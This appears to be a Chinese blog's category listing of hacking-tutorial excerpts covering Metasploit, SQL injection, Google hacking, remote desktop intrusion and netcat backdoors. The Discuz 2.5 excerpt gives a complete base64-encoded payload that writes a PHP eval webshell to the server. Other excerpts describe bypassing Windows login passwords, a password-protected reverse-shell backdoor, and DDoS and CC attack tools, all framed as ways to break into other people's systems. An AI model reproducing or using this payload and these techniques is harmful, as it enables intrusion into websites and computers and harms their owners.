网络安全与黑客技术
文章平均质量分 77
cnstartech
i am a geek , just only...
展开
-
backtract 教程
一、msf (metasploit framework)讲解环境 bt5 R3 root@bt:/# cd /pentest/exploits/framework 可以看到相关的接口 msfcli msfconsole,msfd .............主要用到的有 msfconsole msfpayload scripts msfencod原创 2012-08-31 22:53:18 · 936 阅读 · 0 评论 -
bt5 notes [2]
1:主机发现2:system 识别3:端口扫描4:服务探测5:VPN探测6:智能化扫描search ms051:主机发现ping 当然这个没必要介绍arping 是一个内网(直连网络)的ping 应为在内为如果不会arp 包是不正常的!通常情况在内网使用arping 是%99的能ping通arping -c 3 192.168.1.102转载 2012-07-08 22:59:41 · 841 阅读 · 0 评论 -
传统杀毒软件 vs. 军用恶意软件
作者:迈克尔·卡斯纳 (Michael Kassner)翻译:PurpleEndurer 2012-08-29 第1版 前言:杀毒程序过时了。在这种情况下,我们应该做些什么呢?让我们来了解一下安全社区里是怎么说的。 不要在无防护措施的情况下访问互联网,否则你会后悔的。这样的建议不绝于耳。接下来的会是不是: “这意味着我们大家都在两年或更早之前错过了对这转载 2012-08-30 21:20:23 · 1652 阅读 · 0 评论 -
恶意代码的亲密接触之病毒编程技术
生活在网络时代,无论是作为一名程序员抑或是作为一名普通的电脑使用者,对病毒这个词都已经不再陌生。网络不仅仅是传播信息的快速通道,从另外一个角度来看,也是病毒得以传播和滋生的温床,有资料显示,未安装补丁的Windows操作系统连接至internet平均10-15分钟就会被蠕虫或病毒感染。各种类型的病毒,在人们通过网络查阅信息、交换文件、收听视频时正在悄悄地传播。这些病毒或蠕虫不仅在传播过程中消耗大量转载 2012-08-01 21:56:17 · 965 阅读 · 1 评论 -
bt5 note [5] msf运用层攻击
MSF 图形话界面:armitage一、连环攻击 hosts (代替了db_hosts) (上次扫描的结果放入数据库,可以直接hosts -h查看更多选项) hosts -d (db_del_host 192.168.1.104 ) (清空数据库) services(代替了 db_services) (查看数据库服务) db_nma原创 2012-07-10 21:43:01 · 927 阅读 · 0 评论 -
监视和截获指定进程网络数据传输WSockExpert0.6 工具介绍和使用实例
喜欢脚本入侵技术的朋友,一定听说过闹得纷纷扬扬的上传漏洞吧!有许多利用上传漏洞的工具,比如桂林老兵的“动网上传漏洞利用工具”、“天意上传漏洞工具”等,但是大家在使用这些工具的时候有没有想过它的入侵原理呢?它的背后工作方式是怎么样的?有许多网站并没有打上传漏洞的补丁,为什么无法利用漏洞上传成功呢?今天我们将给大家一个答案,而这个答案依赖一个简单的工具WSockExpert来实现。 一、转载 2012-07-28 16:45:40 · 3505 阅读 · 0 评论 -
CISCO Router配置、升级、隐藏SSID、侦测SSID
一、上网配置如下图进入页面后我们点setup--Basic setup,在internet connetion type选PPPoE拨号的设置。PPPoE拨号可以给ADSL猫拨号,也可以是带帐号的小区宽带使用,应用比较广泛。在user Name:后面填入上网帐号的用户名和在password:后面填上密码后,点击页面下的“save setting”保存设置。原创 2012-07-23 19:14:10 · 2815 阅读 · 0 评论 -
CISCO IOS SSH配置
下面介绍一下相关概念: SSH的概念:SSH的英文全称为Secure Shell,SSH使用TCP的22号端口,其目的是要在非安全的网络上提供安全的远程登陆和其他安全的网络服务, 为什么要使用SSH?telnet以明文传输数据的不安全因素,SSH是为了取代telnet rsa加密算法:主机将自己的公用密钥分发给相关的客户机,客户机在访问主转载 2012-07-24 00:18:31 · 1418 阅读 · 0 评论 -
IEXPRESS使用
首先在“运行”对话框中输入 iexpress 就可以起用程序了! “Create new Self Extraction Directive file” 意思是:“创建新的自解压文件” “Open existing Self ExtractionDirective file” ... 首先在“运行”对话框中输入 iexpress 就可以起用程序了! “Create new转载 2012-07-21 22:17:43 · 2757 阅读 · 0 评论 -
绕过本地验证提交表单(主要是绕过JS等一些验证)
比如上传或者自己定义提交的文件时,会在本地的代码中遇到阻碍,,也就是过 滤,过滤有两种,一种是在远程服务器的脚本上进行的过滤,这段代码是在服务器上运行后产生作用的,这种过 滤方式叫做远程过滤;另一种是在我们的IE浏览器里执行的脚本过滤,就是说是在我们自己的机器上运行后产 生作用的,这种过滤方式叫本地过滤.远程过滤要绕过是比较难的,但是对于仅仅只在本地过滤的程序,我们可原创 2012-07-22 14:03:31 · 4511 阅读 · 0 评论 -
关于暴力破解
在入侵中,经常得到的密码信息是被加密的,如果PCANYWHERE的密码文件,ACCESS数据库的密码.这两 种密码是通过一种算法进行加密的,其加密过程是可逆的,即根据一工式倒推计算出明文密码,这类破解相当简 单只要用相关逆算法解密工具,一秒内即可计算出明文.. 但是现在真正被广泛采用的加密方式是MD5加密,这种加密方法,是不可逆的,即不可以通过工式计算出明 文,MD原创 2012-07-21 23:13:12 · 763 阅读 · 0 评论 -
脚本入侵的基本概念
脚本简单地说就是一条条的文字命令,这些文字命令是我们可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺序执行 脚本在网站系统中的位置: 网站软件部分主要由三大部件组成:1,WEB服务程序;2,数据库程序;3,WEB语言代码(脚本) WEB语言有以下几类:原创 2012-07-21 22:38:17 · 936 阅读 · 0 评论 -
抓包修改后上传数据
目标: 抓取上传的数据包文件,并用工具进行修改,使用NETCAT提交数据包以及使用工具抓取数据包 小知识:我们的电脑被称为客户端,网站称为服务端,上网从网站上获取信息,或者向网站上提交信息,其根本都是客户端和服务端之间信息传递的过程,这个过程以数据包的形式实现的,如果能够抓取到提交的数据包,并进行修改,则可以达到改变在服务器上生成的结果的目的对数据包进行修改后提交达到攻击的目原创 2012-07-22 14:19:21 · 3603 阅读 · 1 评论 -
首个Linux、Mac OS X的跨平台病毒被发现
日前,国外研究人员发现了一种只在Linux和Mac OS X上存在的木马,当计算机被入侵之后,该木马会在机器上安装Wirenet-1键盘记录软件,捕获用户输入的密码和敏感信息。包括Opera、Firefox、Chrome浏览器提交的信息,一些app存储的信息,以及Email、Web组件和聊天应用程序的密码。该恶意软件收集到数据之后会将该数据传送到荷兰一台服务器上。俄罗斯反病毒公司Dr Web针翻译 2012-09-02 17:56:27 · 600 阅读 · 0 评论 -
hack xp by ms12_004_midi for metasploit
local ip : 192.168.0.106不使用 ettercap -T -Q -i eth0 -M arp -P dns_spoof // //下面是操作的一些常用的命令,已经运行后的结果:root@bt:~# msfconsole +-------------------------------------------------------+原创 2012-09-04 15:20:13 · 1607 阅读 · 0 评论 -
Android安卓手机3389远程连接电脑桌面教程
前一期我们介绍过安卓手机通过VNC服务远程连接XP/linux桌面的方法,实现起来需要安装VNC服务软件,今天就介绍利用安卓手机来远程连接Windows自带的3389远程桌面,当然手机端也必须安装一个客户端,电脑端使用自带的远程桌面功能 手机端软件下载: 3389远程桌面连接Remote RDP安卓版 点此下载 安卓手机通过V原创 2012-05-31 22:33:05 · 8910 阅读 · 0 评论 -
不设密码Win7能否远程连接
运行→gpedit.msc→计算机配置”→“安全设置”→“本地策略”→“安全选项”→“帐户:使用空白密码的本地帐户只允许进行控制台登录”策略,双击,把它改为“已禁用”就能用空密码的帐户进行远程桌面连接了原创 2015-07-01 18:30:27 · 629 阅读 · 0 评论 -
radmin
正向连接:由控制端发起连接(RADMIN)反向链接:由被控端发起连接(鸽子) radmin视频教程: http://video.sina.com.cn/v/b/689362-1239479824.htmlRadmin (Remote Administrator) 是一款远程控制软件,可以远程管理公司或个人计算机,实现远程办公。可以进行完全控制、屏幕监视、文件管理、远程DOS操作等功能原创 2013-10-08 23:28:54 · 1800 阅读 · 0 评论 -
ASP.NET常见漏洞
未隐藏错误讯息 开发人员常会将方便排错,但正式上线时却忘了移除,导致一旦程序出错,相关程序代码细节甚至程序片段就赤裸裸地展示出来。黑客可能由其中找到相关的文件位置、数据库信息、组件版本... 等信息,提供入侵的指引。关闭Request Validation 依Hunt的统计,近30%的网站豪迈地关闭了全站的Request验证。若真有需要,针对页面关闭就好,至少伤害面变小,但如果心有余力,避原创 2013-07-16 22:22:14 · 5377 阅读 · 0 评论 -
设置IP策略拒绝用户Ping服务器
Windows Server 2003中设置1.添加IP筛选器第1步,依次单击“开始/管理工具/本地安全策略”,打开“本地安全设置”窗口。右键单击左窗格的“IP安全策略,在本地计算机”选项,执行“管理IP筛选器表和筛选器操作”快捷命令。在“管理IP筛选器列表”选项中单击“添加”按钮,命名这个筛选器名称为“禁止PING”,描述语言可以为“禁止任何其它计算机PING我的主机”,然后单击转载 2013-07-12 12:57:15 · 1091 阅读 · 0 评论 -
NC瑞士军刀增强版[v1.2]
NC瑞士军刀增强版 new features:1. 作为后门使用, 你可以设置密码,这样 就算在无意间被别的入侵者扫描到了, 他也不能连接成功拿到shell2.增强了反向连接功能, 使用参数-R 也是 进行无限的反弹shell, 类似-L 本地循环监听3. 包括原来NC所有的功能,经过压缩, 不但文件大小变小了,功能也有所增强,短小精悍下载地址: 瑞士军刀增强原创 2012-08-05 22:08:56 · 1419 阅读 · 14 评论 -
NC瑞士军刀增强版[v1.3]
旧版 v1.2文章v1.3版本 下载地址 new features: 支持读取FTP文件配置反向连接的ip地址和端口.即 支撑FTP空间上传,从而可以随时改变反向连接的客户端地址。 场景: 保护自己的电脑 可以在自己电脑上安装服务器程序, 如果电脑丢失可以通过修改FTP空间IP文件来指向连接到的客户端,返回服务端的 cmd.ex原创 2013-03-31 12:52:50 · 1002 阅读 · 0 评论 -
ACCESS数据库的注入要点
ACCCESS注入的方法,几个常用语句的使用ACCESS数据库的注入与MSSQL不同,要得到表名,字段,以及字段的内容不能用MSSQL"暴"的方法直接得到(什么是"暴"以后在戒 绍MSSQL注入时会介绍),ACCESS只能用猜解出表名和字段,然后再猜解出字段的长度,最后把字段的内容从第一位到第N位一个个猜解出 来,采用的猜解方法类似玩一个游戏猜大小,比如一个数字,猜是否大于原创 2012-07-22 00:15:36 · 2087 阅读 · 0 评论 -
MSSQL显错模式的手工注入实现原理思考和实战
说到Mssql手工注入,本人喜欢显错模式的,为啥呢,因为你只要构造一个语句,不用你一个一个特意的去猜,程序会自动告诉你我们要的信息,省时省力,不像不显错模式的盲注,可以让你猜上个半天。进入正题,下面来说说我对显错模式原理的思考。 显错模式,起初也是为了方便程序员修改代码,但是,这正好被我们利用了,我们故意让程序出错来爆出我们要的敏感信息。 上次我说到过having 1=转载 2012-09-20 23:10:59 · 901 阅读 · 0 评论 -
Google Hack
Google hack是现在最火爆的黑客技术之一。其原理很简单,就是利用搜索引擎强大的所搜能力,来查找一些存在漏洞的网站。要利用Google来查找网站的漏洞自然要学会Google这个搜索引擎的语法来。下面给大家讲解一下Google的语法,然后在教大家怎么利用它来入侵,这项技术在我们的撒网式攻击技术中是最好的办法。介绍Google成立于1997年,目前已经成为全球第一搜索公司。Googl转载 2012-07-19 22:53:56 · 1666 阅读 · 0 评论 -
backtrack 安装到 arm CPU的手机
以android 为例 我的是HTC G12的 bt5 安装在 android 上面 这样就可以随时随地 "安全检测了" 哈哈废话说完了, 下面开始准备工作, 我的手机是 HTC G12 android 4.0 版本的, 从新刷得4rom 和recovery 目前已经 rooted了(至于怎么刷root下篇文章再说) 内存卡至少3.4G空间 准备以下东西:原创 2012-07-04 17:04:22 · 2561 阅读 · 0 评论 -
cc攻击下载 的思路及防范方法
http://www.cnanubis.cn/bbs/forum.php?mod=viewthread&tid=230&page=1转载 2012-09-11 09:32:16 · 898 阅读 · 0 评论 -
NC 瑞士军刀使用 [1]
首先来看下 所有的参数 windows netcat>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] ...listen for inbound: nc -l -p port [options] [hostname] [port]options: -d原创 2012-06-29 22:54:53 · 1410 阅读 · 0 评论 -
Backtrack5实战系列视频教程
ackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。目前最新与最好用版本是BT5.它可以用来破解WEP,WPA/WPA2加密方式的无线网络也不在话下,当然前提是需要有足够强大的密码字典文件。 如果你仅仅用来破解WIFI,那么就大材小用了,集成了众多安全工具的BT不仅仅在破解WIFI上功能强悍,还有如弱点扫描工具Nessus,渗透平台MSF,转载 2012-07-08 16:09:42 · 1134 阅读 · 1 评论 -
Android安卓手机通过VNC远程连接遥控XP桌面教程
远程桌面就是通过网络的IP来远程连接控制操作系统桌面,比较常见的是PC对PC.这里给大家介绍一下通过安卓手机远程连接桌面的方法,当然要借助VNC远程连接Android安卓手机客户端。通过安装这个客户端就可以远程连接安装有VNC服务的Windows XP/2003以及Linux电脑。 软件下载地址: VNC远程连接Android安卓手机客户端 点此下载原创 2012-05-31 21:46:23 · 4566 阅读 · 0 评论 -
强化远程终端3389入侵
很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时,会发现在连接对方机器后,无法像内网计算机那样可以互传文件,这在很大程度上使入侵后的攻击大打折扣,其实打上微软自家的“补丁”就可以解决这个问题。 在此,笔者就要为大家介绍一下服务器端和客户端的配置方法,让大家能够通过3389终端服务,实现终端机器与本地机器的文件互传。 服务器端(被攻击方) 首先,在http:转载 2012-06-02 19:29:30 · 621 阅读 · 0 评论 -
网络安全知识
常用端口号:代理服务器常用以下端口:(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080(2). SOCKS代理协议服务器常用端口号:1080(3). FTP(文件传输)协议代理服务器常用端口号:21(4). Telnet(远程登录)协议代理服务器常用端口:23 HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端原创 2012-06-03 18:27:57 · 497 阅读 · 0 评论 -
几招常用破解方法
下面谈到了一些在学习解密过程中经常遇到的问题,本人根据自己的经验简单给大家谈一谈。这些问题对于初学者来说常常是很需要搞明白的,根据我自己的学习经历,如果你直接照着很多破解教程去学习的话,多半都会把自己搞得满头的雾水,因为有很多的概念要么自己不是很清楚,要么根本就不知道是怎么一回事,所以希望通过下面的讨论给大家一定的帮助: 1. 断点:所谓断点就是程序被中断的地方,这个词对于解密者转载 2012-05-23 11:04:44 · 1281 阅读 · 0 评论 -
教你识别各类计算机病毒
很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor. RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,我怎么知道是什么病毒啊? 其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。 世界上那么多的病毒,反病毒转载 2012-05-23 11:30:47 · 537 阅读 · 0 评论 -
本地破解WINDOWS XP 系统的登陆密码
有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼,现在我就来给你带来解决的方法. 所需工具 1.U盘一个 2.Usboot(U盘启动制作软件) 3.winrar(压缩软件)先说说思路:方法很简单,当你的机器出现登陆框,要求输入密码时,你按下windows键+U看看有什么反映……?不错!出现了辅助工具管理工具(呵呵~~意味着可以运行放大镜转载 2012-05-23 09:56:12 · 534 阅读 · 1 评论 -
后门程序技术知识全面深解
什么是后门程序 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。 后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。 后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一转载 2012-05-23 10:22:31 · 1366 阅读 · 0 评论 -
js函数劫持与反劫持
说明 : 主要的思路就是重写JS函数, 如果学习过高级语言的朋友 就很容易理解好上代码: 1. 劫持js函数劫持 var _alert = window.alert; window.alert = function (msg) { if(confirm('alert方法被调用')) _alert(msg); }原创 2012-06-25 10:36:34 · 1868 阅读 · 1 评论 -
discuz 2.5 后台拿 WebShell 方法
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论坛根目录下生成demo.php,一句话...方法1:1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{$转载 2012-06-02 16:21:17 · 870 阅读 · 0 评论 -
黑客必备的十五大“兵器”库
一 必备基本工具 1 Netcat 2 IIS工具包 3 VMware 3 DDOS攻击器 4 CC攻击器 5IP攻击器二 端口扫描工具 1 nmap 2 udp_scan 3 NetScanTools 4 SuperScan 5 IPEye 三 Windows工具转载 2012-05-11 23:13:34 · 1559 阅读 · 0 评论 -
回顾2011年被捕的八大黑客
尽管有许多神秘的黑客可以逃避法律的制裁,但是通过举报和逮捕,警方依然取得了傲人的战绩。下面是在今年轰动一时的黑客名单:1.LulzSec首领:Ryan Cleary今年夏天警方搜捕了19岁的英国人Ryan Cleary的寓所,他涉嫌使用分布式拒绝服务攻击(DDoS)袭击了英国SOCA站点,并使之瘫痪。国际唱片业联合会的站点也惨遭袭击。2. 哈弗黑客:Aaro转载 2012-03-07 21:12:06 · 1477 阅读 · 0 评论